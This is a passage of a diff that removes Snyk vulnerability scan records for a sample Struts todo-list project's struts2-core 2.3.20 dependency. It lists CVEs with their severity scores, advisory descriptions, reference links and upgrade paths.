Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-06T17:28:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:22.617066Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Man Yue Mo" - ], - "semver": { - "vulnerable": [ - "[2.3.0, 2.3.35)", - "[2.5.0, 2.5.17)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.35", - "2.5.17" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.3.0, 2.3.35)", - "[2.5.0, 2.5.17)" - ], - "functionId": { - "filePath": "com/opensymphony/xwork2/ActionChainResult.java", - "className": "ActionChainResult", - "functionName": "execute" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://exploit-db.com/exploits/45367", - "title": "Exploit DB" - }, - { - "url": "https://www.exploit-db.com/exploits/45367", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3", - "title": "GitHub Commit" - }, - { - "url": "https://lgtm.com/blog/apache_struts_CVE-2018-11776", - "title": "Lgtm Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1620019", - "title": "RedHat Bugzilla Bug" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-057", - "title": "Struts2 Security Bulletin" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:21.641643Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:35.323655Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:21.641643Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n", - "epssDetails": { - "percentile": "0.99991", - "probability": "0.97527", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11776" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2018-08-22T00:00:00Z", - "functions_new": [ - { - "version": [ - "[2.3.0, 2.3.35)", - "[2.5.0, 2.5.17)" - ], - "functionId": { - "className": "com.opensymphony.xwork2.ActionChainResult", - "functionName": "execute" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-08-17T00:00:00Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2018-08-22T11:53:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.324260Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.35" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-451610", - "title": "Improper Action Name Cleanup", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.29)", - "[2.5, 2.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29", - "2.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:52.582114Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:23.840033Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:52.582114Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Improper Action Name Cleanup. It allowed attackers to have unspecified impact via vectors related to improper action name clean up.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5)\n- [GitHub Commit](https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7)\n", - "epssDetails": { - "percentile": "0.89903", - "probability": "0.02365", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4436" - ], - "CWE": [ - "CWE-459" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2019-07-16T11:14:42.540198Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-09-19T05:25:51Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-09-19T05:25:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:52.582114Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", - "title": "Regular Expression Denial of Service (ReDoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.3.20, 2.3.29)", - "[2.5,2.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29", - "2.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.316157Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", - "epssDetails": { - "percentile": "0.99401", - "probability": "0.95900", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4465" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2019-08-23T13:23:19.812650Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-20T07:45:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-20T07:45:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:51.243501Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", - "credit": [ - "Matthew McClain" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.5.31)", - "[6.1.2,6.1.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.5.31", - "6.1.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21", - "title": "GitHub Commit" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-063", - "title": "Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:27.696682Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:22.161472Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:27.696682Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type field.\r\n\r\n## Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n", - "epssDetails": { - "percentile": "0.86905", - "probability": "0.01484", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-34149" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2023-06-14T10:02:40.213361Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-06-14T09:51:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2023-06-14T10:55:13.206157Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:27.696682Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.31" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-608097", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", - "credit": [ - "Matthias Kaiser" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.5.22)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.5.22" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://www.exploit-db.com/exploits/49068", - "title": "Exploit" - }, - { - "url": "https://github.com/PrinceFPF/CVE-2019-0230", - "title": "Proof Of Concept" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-059", - "title": "Security Bulletin" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:13.645371Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:03.579407Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:34.752855Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:13.645371Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:03.579407Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Exploit](https://www.exploit-db.com/exploits/49068)\n- [Proof Of Concept](https://github.com/PrinceFPF/CVE-2019-0230)\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-059)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml)\n", - "epssDetails": { - "percentile": "0.99361", - "probability": "0.95346", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-0230" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-08-21T14:31:35.397242Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-08-11T14:14:01Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-08-21T14:06:54Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:22.021057Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.22" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", - "credit": [ - "Takeshi Terada of Mitsui Bussan Secure Directions", - "Inc" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.5.22)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.5.22" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-060", - "title": "Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:16.027732Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:03.532706Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.403682Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:16.027732Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:03.532706Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n", - "epssDetails": { - "percentile": "0.95581", - "probability": "0.13147", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-0233" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-08-21T14:39:32.053413Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-08-11T14:36:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-08-21T14:36:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:03.532706Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.22" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", - "title": "Unrestricted Upload of File with Dangerous Type", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://issues.apache.org/jira/browse/WW-5055", - "title": "Bug Report" - }, - { - "url": "https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:45:53.807283Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:42.248460Z" - }, - { - "type": "secondary", - "vector": 